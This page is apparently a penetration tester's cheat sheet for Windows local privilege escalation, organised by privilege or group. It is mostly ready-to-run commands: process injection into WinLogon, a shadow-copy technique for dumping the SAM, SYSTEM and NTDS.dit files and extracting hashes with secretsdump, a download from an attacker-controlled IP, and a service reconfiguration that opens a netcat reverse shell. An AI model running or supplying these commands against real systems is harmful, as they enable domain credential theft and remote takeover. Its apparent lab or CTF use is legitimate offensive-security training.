Skip to main content

Windows Local Privilege Escalation

SeDebugPrivilege

Migrate PID to privileged process such as WinLogon using ProcessInjection to load adopt.

WinLogon PID: 3488

Adopt binary: adopt.exe

dotnet inline-execute /home/user/ProcessInjection.exe /f:raw /pid:3488 /t:1 /path:C:\Windows\Tasks\adopt.exe

SeImpersonatePrivilege

Usually Web (IIS) has this enabled.

  • GodPotato, printerspoofer to Privesc.

BackupOperators

cd c:\temp
echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append        
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
diskshadow.exe /s c:\temp\diskshadow.txt
(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.48/disk.txt", "C:\Windows\Temp\disk.txt")
diskshadow.exe /s C:\Windows\Temp\disk.txt
E:
dir windows/ntds
reg save hklm\system
reg save hklm\system c:\windows\temp\system.bak
reg save hklm\sam c:\windows\temp\sam.bak
upload ../../../../../../..//home/kali/tools/SeBackupPrivilege/SeBackupPrivilegeCmdLets.dll
upload ../../../../../../..//home/kali/tools/SeBackupPrivilege/SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSeBackupPrivilege e:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
cd c:\windows\temp
download ntds.dit
download sam.bak
download system.bak
impacket-secretsdump -ntds ntds.dit -system system.bak -hashes lnhash:nthash LOCAL -outputfile ntlm-extract

Server Operators

upload /usr/share/windows-resources/binaries/nc.exe
sc.exe config vss binPath="C:\Path\nc.exe -e cmd.exe ip 1234"
sc.exe stop vss
sc.exe start vss